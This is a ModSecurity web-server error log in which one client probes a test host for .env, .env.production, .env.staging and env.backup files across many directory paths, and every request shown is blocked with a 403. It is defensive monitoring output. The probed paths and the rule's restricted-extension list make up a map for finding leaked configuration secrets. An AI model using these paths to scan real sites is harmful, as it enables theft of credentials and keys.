[Fri Dec 19 21:13:47.715741 2025] [:error] [pid 834992] [client 45.148.10.159:46658] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aUWx-2UkfshjVnOZlCKIxgAAAAI"]
[Fri Dec 19 21:13:47.715890 2025] [:error] [pid 834992] [client 45.148.10.159:46658] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aUWx-2UkfshjVnOZlCKIxgAAAAI"]
[Fri Dec 19 21:13:48.103048 2025] [:error] [pid 839892] [client 45.148.10.159:46668] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aUWx_H5m84_EwtKPef0u9gAAAAs"]
[Fri Dec 19 21:13:48.103264 2025] [:error] [pid 839892] [client 45.148.10.159:46668] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aUWx_H5m84_EwtKPef0u9gAAAAs"]
[Fri Dec 19 21:13:48.103448 2025] [:error] [pid 839892] [client 45.148.10.159:46668] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aUWx_H5m84_EwtKPef0u9gAAAAs"]
[Fri Dec 19 21:13:48.835486 2025] [:error] [pid 839890] [client 45.148.10.159:60930] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /awstats/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aUWx_IQStO_v-3hKEQTFEQAAAAk"]
[Fri Dec 19 21:13:48.836369 2025] [:error] [pid 839890] [client 45.148.10.159:60930] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aUWx_IQStO_v-3hKEQTFEQAAAAk"]
[Fri Dec 19 21:13:48.836577 2025] [:error] [pid 839890] [client 45.148.10.159:60930] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aUWx_IQStO_v-3hKEQTFEQAAAAk"]
[Fri Dec 19 21:13:49.262611 2025] [:error] [pid 839893] [client 45.148.10.159:60938] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /conf/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aUWx_ZyFITheFL9PQVsTbQAAAAw"]
[Fri Dec 19 21:13:49.262822 2025] [:error] [pid 839893] [client 45.148.10.159:60938] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aUWx_ZyFITheFL9PQVsTbQAAAAw"]
[Fri Dec 19 21:13:49.262977 2025] [:error] [pid 839893] [client 45.148.10.159:60938] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aUWx_ZyFITheFL9PQVsTbQAAAAw"]
[Fri Dec 19 21:13:49.327846 2025] [:error] [pid 839893] [client 45.148.10.159:60938] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aUWx_ZyFITheFL9PQVsTbgAAAAw"]
[Fri Dec 19 21:13:49.328056 2025] [:error] [pid 839893] [client 45.148.10.159:60938] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aUWx_ZyFITheFL9PQVsTbgAAAAw"]
[Fri Dec 19 21:13:49.328211 2025] [:error] [pid 839893] [client 45.148.10.159:60938] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aUWx_ZyFITheFL9PQVsTbgAAAAw"]
[Fri Dec 19 21:13:49.571385 2025] [:error] [pid 842793] [client 45.148.10.159:60952] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aUWx_d0gNgrzumDf_nEYHQAAAA8"]
[Fri Dec 19 21:13:49.571616 2025] [:error] [pid 842793] [client 45.148.10.159:60952] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aUWx_d0gNgrzumDf_nEYHQAAAA8"]
[Fri Dec 19 21:13:49.571784 2025] [:error] [pid 842793] [client 45.148.10.159:60952] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aUWx_d0gNgrzumDf_nEYHQAAAA8"]
[Fri Dec 19 21:13:49.641628 2025] [:error] [pid 842793] [client 45.148.10.159:60952] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aUWx_d0gNgrzumDf_nEYHgAAAA8"]
[Fri Dec 19 21:13:49.641838 2025] [:error] [pid 842793] [client 45.148.10.159:60952] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aUWx_d0gNgrzumDf_nEYHgAAAA8"]
[Fri Dec 19 21:13:49.641993 2025] [:error] [pid 842793] [client 45.148.10.159:60952] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aUWx_d0gNgrzumDf_nEYHgAAAA8"]
[Fri Dec 19 21:13:49.715803 2025] [:error] [pid 842793] [client 45.148.10.159:60952] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aUWx_d0gNgrzumDf_nEYHwAAAA8"]
[Fri Dec 19 21:13:49.716022 2025] [:error] [pid 842793] [client 45.148.10.159:60952] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aUWx_d0gNgrzumDf_nEYHwAAAA8"]
[Fri Dec 19 21:13:49.716186 2025] [:error] [pid 842793] [client 45.148.10.159:60952] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aUWx_d0gNgrzumDf_nEYHwAAAA8"]
[Fri Dec 19 21:13:49.789503 2025] [:error] [pid 842793] [client 45.148.10.159:60952] [client 45.148.10.159] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aUWx_d0gNgrzumDf_nEYIAAAAA8"]
[Fri Dec 19 21:13:49.789785 2025] [:error] [pid 842793] [client 45.148.10.159:60952] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aUWx_d0gNgrzumDf_nEYIAAAAA8"]
[Fri Dec 19 21:13:49.789967 2025] [:error] [pid 842793] [client 45.148.10.159:60952] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aUWx_d0gNgrzumDf_nEYIAAAAA8"]
[Fri Dec 19 21:13:50.849440 2025] [:error] [pid 850607] [client 45.148.10.159:60964] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.vscode/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aUWx_nPx2lx5B6vbh26PUgAAAAE"]
[Fri Dec 19 21:13:50.849698 2025] [:error] [pid 850607] [client 45.148.10.159:60964] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aUWx_nPx2lx5B6vbh26PUgAAAAE"]
[Fri Dec 19 21:13:50.849891 2025] [:error] [pid 850607] [client 45.148.10.159:60964] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aUWx_nPx2lx5B6vbh26PUgAAAAE"]
[Fri Dec 19 21:13:51.017570 2025] [:error] [pid 850607] [client 45.148.10.159:60964] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /js/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aUWx_3Px2lx5B6vbh26PUwAAAAE"]
[Fri Dec 19 21:13:51.017796 2025] [:error] [pid 850607] [client 45.148.10.159:60964] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aUWx_3Px2lx5B6vbh26PUwAAAAE"]
[Fri Dec 19 21:13:51.017980 2025] [:error] [pid 850607] [client 45.148.10.159:60964] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aUWx_3Px2lx5B6vbh26PUwAAAAE"]
[Fri Dec 19 21:13:51.141502 2025] [:error] [pid 850607] [client 45.148.10.159:60964] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aUWx_3Px2lx5B6vbh26PVAAAAAE"]
[Fri Dec 19 21:13:51.141715 2025] [:error] [pid 850607] [client 45.148.10.159:60964] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aUWx_3Px2lx5B6vbh26PVAAAAAE"]
[Fri Dec 19 21:13:51.141898 2025] [:error] [pid 850607] [client 45.148.10.159:60964] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aUWx_3Px2lx5B6vbh26PVAAAAAE"]
[Fri Dec 19 21:13:51.256397 2025] [:error] [pid 850607] [client 45.148.10.159:60964] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aUWx_3Px2lx5B6vbh26PVQAAAAE"]
[Fri Dec 19 21:13:51.256609 2025] [:error] [pid 850607] [client 45.148.10.159:60964] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aUWx_3Px2lx5B6vbh26PVQAAAAE"]
[Fri Dec 19 21:13:51.256795 2025] [:error] [pid 850607] [client 45.148.10.159:60964] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aUWx_3Px2lx5B6vbh26PVQAAAAE"]
[Fri Dec 19 21:13:51.347408 2025] [:error] [pid 850607] [client 45.148.10.159:60964] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aUWx_3Px2lx5B6vbh26PVgAAAAE"]
[Fri Dec 19 21:13:51.347615 2025] [:error] [pid 850607] [client 45.148.10.159:60964] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aUWx_3Px2lx5B6vbh26PVgAAAAE"]
